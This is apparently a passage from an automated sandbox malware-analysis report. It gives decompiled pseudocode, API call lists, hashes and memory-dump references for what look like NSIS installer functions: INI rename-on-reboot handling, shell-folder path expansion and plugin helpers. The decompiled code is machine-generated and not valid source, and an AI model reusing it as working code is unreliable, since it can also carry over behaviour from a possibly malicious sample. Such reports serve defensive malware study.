                                                                                                                    • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)( *0x423f50 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                                    0x004058ec
                                                                                                                    0x004058f3
                                                                                                                    0x004058f7
                                                                                                                    0x00405900
                                                                                                                    0x00405904
                                                                                                                    0x00405a43
                                                                                                                    0x00405a43
                                                                                                                    0x00000000
                                                                                                                    0x00405a43
                                                                                                                    0x00405904
                                                                                                                    0x00405910
                                                                                                                    0x00405926
                                                                                                                    0x0040594e
                                                                                                                    0x00405959
                                                                                                                    0x0040595d
                                                                                                                    0x0040597d
                                                                                                                    0x00405984
                                                                                                                    0x0040598e
                                                                                                                    0x0040599b
                                                                                                                    0x004059a0
                                                                                                                    0x004059a5
                                                                                                                    0x004059a9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004059b8
                                                                                                                    0x004059ba
                                                                                                                    0x004059c7
                                                                                                                    0x004059cb
                                                                                                                    0x00405a3c
                                                                                                                    0x00405a3d
                                                                                                                    0x00000000
                                                                                                                    0x004059e7
                                                                                                                    0x004059f4
                                                                                                                    0x00405a59
                                                                                                                    0x00405a60
                                                                                                                    0x00405a07
                                                                                                                    0x00405a07
                                                                                                                    0x00405a09
                                                                                                                    0x00405a12
                                                                                                                    0x00405a1d
                                                                                                                    0x00405a2f
                                                                                                                    0x00405a36
                                                                                                                    0x00000000
                                                                                                                    0x00405a36
                                                                                                                    0x00405a62
                                                                                                                    0x00405a63
                                                                                                                    0x00405a68
                                                                                                                    0x00405a6a
                                                                                                                    0x00405a77
                                                                                                                    0x00405a77
                                                                                                                    0x00405a7b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405a6c
                                                                                                                    0x00405a6c
                                                                                                                    0x00405a6f
                                                                                                                    0x00405a72
                                                                                                                    0x00405a73
                                                                                                                    0x00000000
                                                                                                                    0x00405a6c
                                                                                                                    0x004059ff
                                                                                                                    0x00405a04
                                                                                                                    0x00000000
                                                                                                                    0x00405a04
                                                                                                                    0x004059cb
                                                                                                                    0x00405928
                                                                                                                    0x00405933
                                                                                                                    0x0040593c
                                                                                                                    0x00405940
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405940
                                                                                                                    0x00405a4d

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                      • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 0040593C
                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00405959
                                                                                                                    • wsprintfA.USER32 ref: 00405977
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                                                                                                    • GlobalFree.KERNEL32 ref: 00405A36
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                                                                                                      • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                      • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                    • String ID: %s=%s$@!B$[Rename]
                                                                                                                    • API String ID: 3445103937-2946522640
                                                                                                                    • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                    • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                                                                                    • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                    • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 74%
                                                                                                                    			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42371c - 4 + _t36 * 4);
				}
				_t74 =  *0x423f78 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}




























                                                                                                                    0x00405bba
                                                                                                                    0x00405bba
                                                                                                                    0x00405bba
                                                                                                                    0x00405bc0
                                                                                                                    0x00405bc5
                                                                                                                    0x00405bd6
                                                                                                                    0x00405bd6
                                                                                                                    0x00405be1
                                                                                                                    0x00405be3
                                                                                                                    0x00405be8
                                                                                                                    0x00405beb
                                                                                                                    0x00405bec
                                                                                                                    0x00405bf3
                                                                                                                    0x00405bf5
                                                                                                                    0x00405bfb
                                                                                                                    0x00405bfe
                                                                                                                    0x00405bfe
                                                                                                                    0x00405dd7
                                                                                                                    0x00405dd7
                                                                                                                    0x00405ddb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405c0b
                                                                                                                    0x00405c11
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405c17
                                                                                                                    0x00405c18
                                                                                                                    0x00405c1b
                                                                                                                    0x00405c1e
                                                                                                                    0x00405dca
                                                                                                                    0x00405dd4
                                                                                                                    0x00405dd6
                                                                                                                    0x00405dd6
                                                                                                                    0x00405dcc
                                                                                                                    0x00405dce
                                                                                                                    0x00405dd0
                                                                                                                    0x00405dd1
                                                                                                                    0x00405dd1
                                                                                                                    0x00000000
                                                                                                                    0x00405dca
                                                                                                                    0x00405c24
                                                                                                                    0x00405c28
                                                                                                                    0x00405c38
                                                                                                                    0x00405c3c
                                                                                                                    0x00405c43
                                                                                                                    0x00405c46
                                                                                                                    0x00405c4a
                                                                                                                    0x00405c50
                                                                                                                    0x00405c53
                                                                                                                    0x00405c56
                                                                                                                    0x00405c59
                                                                                                                    0x00405d74
                                                                                                                    0x00405d77
                                                                                                                    0x00405da7
                                                                                                                    0x00405daa
                                                                                                                    0x00405daf
                                                                                                                    0x00405db3
                                                                                                                    0x00405db3
                                                                                                                    0x00405db8
                                                                                                                    0x00405db9
                                                                                                                    0x00405dbe
                                                                                                                    0x00405dc1
                                                                                                                    0x00405dc3
                                                                                                                    0x00000000
                                                                                                                    0x00405dc3
                                                                                                                    0x00405d79
                                                                                                                    0x00405d7c
                                                                                                                    0x00405d91
                                                                                                                    0x00405d98
                                                                                                                    0x00405d7e
                                                                                                                    0x00405d85
                                                                                                                    0x00405d85
                                                                                                                    0x00405da0
                                                                                                                    0x00405da3
                                                                                                                    0x00405d6c
                                                                                                                    0x00405d6d
                                                                                                                    0x00405d6d
                                                                                                                    0x00000000
                                                                                                                    0x00405da3
                                                                                                                    0x00405c61
                                                                                                                    0x00405c62
                                                                                                                    0x00405c68
                                                                                                                    0x00405c6a
                                                                                                                    0x00405c84
                                                                                                                    0x00405c84
                                                                                                                    0x00405c8b
                                                                                                                    0x00405c8b
                                                                                                                    0x00405c92
                                                                                                                    0x00405c96
                                                                                                                    0x00405c96
                                                                                                                    0x00405c97
                                                                                                                    0x00405c99
                                                                                                                    0x00405cd2
                                                                                                                    0x00405cd5
                                                                                                                    0x00405ce5
                                                                                                                    0x00405ce8
                                                                                                                    0x00405cf0
                                                                                                                    0x00405cf6
                                                                                                                    0x00405cf6
                                                                                                                    0x00405d52
                                                                                                                    0x00405d52
                                                                                                                    0x00405d54
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405cfa
                                                                                                                    0x00405d01
                                                                                                                    0x00405d02
                                                                                                                    0x00405d04
                                                                                                                    0x00405d1e
                                                                                                                    0x00405d2c
                                                                                                                    0x00405d32
                                                                                                                    0x00405d34
                                                                                                                    0x00405d4f
                                                                                                                    0x00405d4f
                                                                                                                    0x00405d4f
                                                                                                                    0x00000000
                                                                                                                    0x00405d4f
                                                                                                                    0x00405d3a
                                                                                                                    0x00405d45
                                                                                                                    0x00405d4b
                                                                                                                    0x00405d4d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405d4d
                                                                                                                    0x00405d06
                                                                                                                    0x00405d09
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405d18
                                                                                                                    0x00405d1a
                                                                                                                    0x00405d1c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405d1c
                                                                                                                    0x00000000
                                                                                                                    0x00405d52
                                                                                                                    0x00405cdd
                                                                                                                    0x00000000
                                                                                                                    0x00405c9b
                                                                                                                    0x00405ca0
                                                                                                                    0x00405cb6
                                                                                                                    0x00405cbb
                                                                                                                    0x00405cbe
                                                                                                                    0x00405d5b
                                                                                                                    0x00405d5b
                                                                                                                    0x00405d5f
                                                                                                                    0x00405d67
                                                                                                                    0x00405d67
                                                                                                                    0x00000000
                                                                                                                    0x00405d5f
                                                                                                                    0x00405cc8
                                                                                                                    0x00405d56
                                                                                                                    0x00405d56
                                                                                                                    0x00405d59
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405d59
                                                                                                                    0x00405c99
                                                                                                                    0x00405c6c
                                                                                                                    0x00405c70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405c72
                                                                                                                    0x00405c76
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405c78
                                                                                                                    0x00405c7c
                                                                                                                    0x00000000
                                                                                                                    0x00405c7e
                                                                                                                    0x00405c7e
                                                                                                                    0x00000000
                                                                                                                    0x00405c7e
                                                                                                                    0x00405c7c
                                                                                                                    0x00405de1
                                                                                                                    0x00405deb
                                                                                                                    0x00405df7
                                                                                                                    0x00405df7
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetVersion.KERNEL32(?,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                                                                                                                    • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF0
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                                                                                    • SHGetPathFromIDListA.SHELL32(0040F0E0,Call), ref: 00405D3A
                                                                                                                    • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                                                                                    • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                                                                                    • lstrlenA.KERNEL32(Call,?,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                    • API String ID: 900638850-1230650788
                                                                                                                    • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                                                                    • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                                                                                    • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                                                                    • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100025FE, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E100025FE(void* __edx, intOrPtr* _a4) {
				char _v80;
				intOrPtr _v84;
				char _v92;
				intOrPtr* _t20;
				intOrPtr _t23;
				void* _t25;
				CHAR* _t26;
				void* _t27;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr _t38;
				void* _t41;
				intOrPtr _t42;
				void* _t44;
				char* _t45;
				int _t48;
				int _t49;
				void* _t53;
				intOrPtr _t54;
				CHAR** _t57;
				CHAR** _t58;
				void* _t59;
				void* _t60;

				_t53 = __edx;
				_t60 =  &_v84;
				_t20 = _a4;
				_t54 =  *((intOrPtr*)(_t20 + 0x814));
				_v84 = _t54;
				_t57 = (_t54 + 0x41 << 5) + _t20;
				do {
					if( *((intOrPtr*)(_t57 - 4)) != 0xffffffff) {
						_t58 = _t57;
					} else {
						_t58 =  *_t57;
					}
					_t59 = E10001541();
					_t48 = 0;
					_t23 =  *((intOrPtr*)(_t57 - 8));
					if(_t23 == 0) {
						lstrcpyA(_t59, 0x10004034);
					} else {
						_t32 = _t23 - 1;
						if(_t32 == 0) {
							_push( *_t58);
							goto L12;
						} else {
							_t34 = _t32 - 1;
							if(_t34 == 0) {
								E1000176C(_t53,  *_t58, _t58[1], _t59);
								goto L13;
							} else {
								_t36 = _t34 - 1;
								if(_t36 == 0) {
									_t49 = lstrlenA( *_t58);
									_t38 =  *0x10004058;
									if(_t49 >= _t38) {
										_t49 = _t38 - 1;
									}
									_t9 = _t49 + 1; // 0x1
									lstrcpynA(_t59,  *_t58, _t9);
									 *(_t49 + _t59) =  *(_t49 + _t59) & 0x00000000;
									_t48 = 0;
								} else {
									_t41 = _t36 - 1;
									if(_t41 == 0) {
										_t42 =  *0x10004058;
										_push(0);
										_push(0);
										_push(_t42);
										_push(_t59);
										_push(_t42);
										_push( *_t58);
										goto L16;
									} else {
										_t44 = _t41 - 1;
										if(_t44 == 0) {
											_t45 =  &_v80;
											_push(0x27);
											_push(_t45);
											_push( *_t58);
											" {<u@u<u"();
											_push(0);
											_push(0);
											_push( *0x10004058);
											_push(_t59);
											_push(_t45);
											_push( &_v92);
											L16:
											WideCharToMultiByte(_t48, _t48, ??, ??, ??, ??, ??, ??);
										} else {
											if(_t44 == 1) {
												_push( *_t57);
												L12:
												wsprintfA(_t59, 0x10004008);
												L13:
												_t60 = _t60 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					_t25 = _t57[5];
					if(_t25 != _t48 && ( *_a4 != 2 ||  *((intOrPtr*)(_t57 - 4)) > _t48)) {
						GlobalFree(_t25);
					}
					_t26 = _t57[4];
					if(_t26 != _t48) {
						if(_t26 != 0xffffffff) {
							if(_t26 > _t48) {
								E1000160E(_t26 - 1, _t59);
								goto L32;
							}
						} else {
							E1000159E(_t59);
							L32:
						}
					}
					_t27 = GlobalFree(_t59);
					_v84 = _v84 - 1;
					_t57 = _t57 - 0x20;
				} while (_v84 >= _t48);
				return _t27;
			}



























                                                                                                                    0x100025fe
                                                                                                                    0x100025fe
                                                                                                                    0x10002601
                                                                                                                    0x10002609
                                                                                                                    0x1000260f
                                                                                                                    0x10002619
                                                                                                                    0x1000261b
                                                                                                                    0x1000261f
                                                                                                                    0x10002625
                                                                                                                    0x10002621
                                                                                                                    0x10002621
                                                                                                                    0x10002621
                                                                                                                    0x1000262c
                                                                                                                    0x10002631
                                                                                                                    0x10002633
                                                                                                                    0x10002635
                                                                                                                    0x100026ea
                                                                                                                    0x1000263b
                                                                                                                    0x1000263b
                                                                                                                    0x1000263c
                                                                                                                    0x100026dd
                                                                                                                    0x00000000
                                                                                                                    0x10002642
                                                                                                                    0x10002642
                                                                                                                    0x10002643
                                                                                                                    0x100026d6
                                                                                                                    0x00000000
                                                                                                                    0x10002649
                                                                                                                    0x10002649
                                                                                                                    0x1000264a
                                                                                                                    0x100026ad
                                                                                                                    0x100026af
                                                                                                                    0x100026b6
                                                                                                                    0x100026b8
                                                                                                                    0x100026b8
                                                                                                                    0x100026bb
                                                                                                                    0x100026c2
                                                                                                                    0x100026c8
                                                                                                                    0x100026cc
                                                                                                                    0x1000264c
                                                                                                                    0x1000264c
                                                                                                                    0x1000264d
                                                                                                                    0x1000268f
                                                                                                                    0x10002694
                                                                                                                    0x10002695
                                                                                                                    0x10002696
                                                                                                                    0x10002697
                                                                                                                    0x10002698
                                                                                                                    0x10002699
                                                                                                                    0x00000000
                                                                                                                    0x1000264f
                                                                                                                    0x1000264f
                                                                                                                    0x10002650
                                                                                                                    0x1000266f
                                                                                                                    0x10002673
                                                                                                                    0x10002675
                                                                                                                    0x10002676
                                                                                                                    0x10002678
                                                                                                                    0x1000267e
                                                                                                                    0x1000267f
                                                                                                                    0x10002680
                                                                                                                    0x10002686
                                                                                                                    0x10002687
                                                                                                                    0x1000268c
                                                                                                                    0x1000269b
                                                                                                                    0x1000269d
                                                                                                                    0x10002652
                                                                                                                    0x10002653
                                                                                                                    0x10002659
                                                                                                                    0x1000265b
                                                                                                                    0x10002661
                                                                                                                    0x10002667
                                                                                                                    0x10002667
                                                                                                                    0x10002667
                                                                                                                    0x10002653
                                                                                                                    0x10002650
                                                                                                                    0x1000264d
                                                                                                                    0x1000264a
                                                                                                                    0x10002643
                                                                                                                    0x1000263c
                                                                                                                    0x100026f0
                                                                                                                    0x100026f5
                                                                                                                    0x10002706
                                                                                                                    0x10002706
                                                                                                                    0x1000270c
                                                                                                                    0x10002711
                                                                                                                    0x10002716
                                                                                                                    0x10002722
                                                                                                                    0x10002727
                                                                                                                    0x00000000
                                                                                                                    0x1000272c
                                                                                                                    0x10002718
                                                                                                                    0x10002719
                                                                                                                    0x1000272d
                                                                                                                    0x1000272d
                                                                                                                    0x10002716
                                                                                                                    0x1000272f
                                                                                                                    0x10002735
                                                                                                                    0x10002739
                                                                                                                    0x1000273c
                                                                                                                    0x1000274d

                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 10002661
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027,?,?,?,00000000), ref: 10002678
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,00000000), ref: 1000269D
                                                                                                                      • Part of subcall function 1000160E: lstrcpyA.KERNEL32(-10004047,00000000,?,1000118F,?,00000000), ref: 10001636
                                                                                                                    • GlobalFree.KERNEL32 ref: 10002706
                                                                                                                    • GlobalFree.KERNEL32 ref: 1000272F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeGlobal$ByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                                    • String ID: {<u@u<u
                                                                                                                    • API String ID: 3910409330-2852364109
                                                                                                                    • Opcode ID: 87f5dfd5f3f98710c2d4cb889120a35c512483e8d73b73e88293233abc1def33
                                                                                                                    • Instruction ID: 01fa9c58c50faa9564c1a8f469434e2f7c3d79e669d628752182ef5a144b3071
